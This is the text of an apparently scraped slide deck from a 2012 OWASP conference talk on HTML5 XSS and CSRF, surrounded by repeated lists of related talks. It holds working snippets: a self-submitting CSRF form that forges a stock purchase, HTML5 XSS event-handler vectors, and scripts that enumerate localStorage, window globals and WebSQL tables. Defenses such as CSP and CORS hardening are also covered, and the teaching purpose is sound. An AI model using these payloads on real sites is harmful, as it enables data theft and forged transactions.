Shreeraj - Hacking Web 2 0 - ClubHack2007
 
JClouds at San Francisco Java User Group
JClouds at San Francisco Java User GroupJClouds at San Francisco Java User Group
JClouds at San Francisco Java User Group
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
HTML5: An Overview
HTML5: An OverviewHTML5: An Overview
HTML5: An Overview
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
新 · 交互
新 · 交互新 · 交互
新 · 交互
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5
 
HTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすものHTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすもの
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012
 
Technology Trends
Technology TrendsTechnology Trends
Technology Trends
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
 

More from Shreeraj Shah

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingShreeraj Shah
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Shreeraj Shah
 

More from Shreeraj Shah (15)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Recently uploaded

Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfJamie (Taka) Wang
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 

Recently uploaded (20)

Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 

XSS and CSRF with HTML5

  • 1. XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP OWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj  Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd.  Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev)  Interest  Web security research  Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.  Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
  • 3. HTML5 VECTORS – ATTACK SURFACE OWASP 3
  • 4. HTML5 – Attacks on the rise … Evolution of HTML5  1991 – HTML started (plain and simple)  1996 – CSS & JavaScript (Welcome to world of XSS and browser security)  2000 – XHTML1 (Growing concerns and attacks on browsers)  2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion)  2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
  • 5. Modern Browser Model Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
  • 6. HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSS Single JavaScript Internet DOM/Page Application XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
  • 7. CSRF WITH HTML5 OWASP 7
  • 8. CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
  • 9. SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
  • 10. Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
  • 11. CSRF injection – splitting and forcing … <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"? ><methodCall><methodName>stocks.buy</methodName><params><param ><value><string>MSFT</string></value></param><param><value><double>2 6</double></value></param></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 11
  • 12. CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
  • 13. XHR – Level 2 powering CSRF XHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/download xhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“ Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
  • 14. CORS & XHR – ingredients for CSRF Before HTML5 – Cross Domain was not possible through XHR (SOP applicable) HTML5 – allows cross origin calls with XHR-Level 2 calls CORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls) Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
  • 15. CORS based HTTP Headers Request Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight) Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
  • 16. XHR – Stealth POST/GET CSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
  • 17. Exploiting the use case CORS preflight bypass – certain Content-Type bypass preflight HTTP Forcing cookie replay by “withCredentials” Internal network scanning and tunneling Information harvesting (internal crawling) Stealth browser shell – post XSS (Allow origin- *) Business functionality abuse (upload and binary streams) OWASP 17
  • 18. CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
  • 19. CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
  • 20. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
  • 21. CSRF & HTML5 OWASP 21
  • 22. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
  • 23. CSRF & HTML5 OWASP 23
  • 24. CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
  • 25. CSRF/Upload - POC OWASP 25
  • 26. CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
  • 27. CSRF/Upload OWASP 27
  • 28. Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
  • 29. Internal Scan for CORS OWASP 29
  • 30. Scan and Defend Scan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or not Defense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
  • 31. XSS WITH HTML5 OWASP 31
  • 32. XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
  • 33. HTML5 – Tags/Attributes/Events Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys) Attributes – form, submit, autofocus, sandbox, manifest, rel etc. Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
  • 34. XSS variants Media tags Examples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
  • 35. XSS variants Exploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
  • 36. XSS variants Form & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">test Etc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
  • 37. Scan and Defend Scan and look for Reflected or Persistent XSS spots with HTML5 tags Defense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
  • 38. CSP in Action – HTML5 defense … Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
  • 39. Blocking Scripts Content-Security-Policy: script-src 'self‘ Only allowing script from the self Other mechanism 'unsafe-inline' - blocking inline 'unsafe-eval‘ – blocking eval type calls Post XSS defense can be crafted OWASP 39
  • 40. Controlling Browser connect-src – Controlling WebSocket, XHR etc. frame-src – Source of the frame (ClickJacking) object-src – Flash, Silverlight etc. media-src – controlling audio and video img/style – image and style sources default-src https:; - locking over SSL only OWASP 40
  • 41. Example  Persistent XSS injected HTTP/1.1 200 OK Date: Wed, 12 Sep 2012 14:40:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-WebKit-CSP: script-src 'self' X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 6146 OWASP 41
  • 42. Storage extraction with XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
  • 43. Web Storage Extraction Browser has one place to store data – Cookie (limited and replayed) HTML5 – Storage API provided (Local and Session) Can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 43
  • 44. Web Storage Extraction It is possible to steal them through XSS or via JavaScript Session hijacking – HttpOnly of no use getItem and setItem calls XSS the box and scan through storage OWASP 44
  • 45. Blind storage enumeration if(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); } } Above code allows all storage variable extraction OWASP 45
  • 46. File System Storage HTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem; It becomes a full blown local system for application in sandbox It empowers application OWASP 46
  • 47. File System Storage It provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); }  App can have full filesystem in place now. OWASP 47
  • 48. Sensitive information filesystem Assuming app is creating profile on local system OWASP 48
  • 49. Extraction through XSS Once have an entry point – game over! OWASP 49
  • 50. Single DOM/One Page App - XSS Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
  • 51. Blind Enumeration for(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){} } OWASP 51
  • 52. Global Sensitive Information Extraction from DOM HTML5 apps running on Single DOM Having several key global variables, objects and array var arrayGlobals = ['my@email.com',"12141hewvsdr9321343423mjfdvint","t est.com"]; Post DOM based exploitation possible and harvesting all these values. OWASP 52
  • 53. Global Sensitive Information Extraction from DOM for(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} } } OWASP 53
  • 54. Scan and Defend Scan and look for Scanning storage Defense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
  • 55. SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
  • 56. SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 56
  • 57. SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 57
  • 58. Blind WebSQL Enumeration var dbo; var table; var usertable; for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'', [],function(tx,results){ table=results; },null); }); } }catch(ex){} } if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
  • 59. Blind WebSQL Enumeration We will run through all objects and get object where constructor is “Database” We will make Select query directly to sqlite_master database We will grab 1st table leaving webkit table on 0th entry OWASP 59
  • 61. Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight Flash API (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
  • 62. Web Messaging  HTML5 is having new interframe communication system called Web Messaging.  By postMessage() call parent frame/domain can call with the iframe  Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible  worker.webkitPostMessage – faster transferable objects OWASP 62
  • 63. Web Messaging - Scenario If postMessage() is set to * so page can be loaded in iframe and messaging can be hijacked Also, origin is not set to fixed then again frame listen from any domian – again an issue Stream coming needs to be checked before innerHTML or eval() Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
  • 64. Origin check OWASP 64
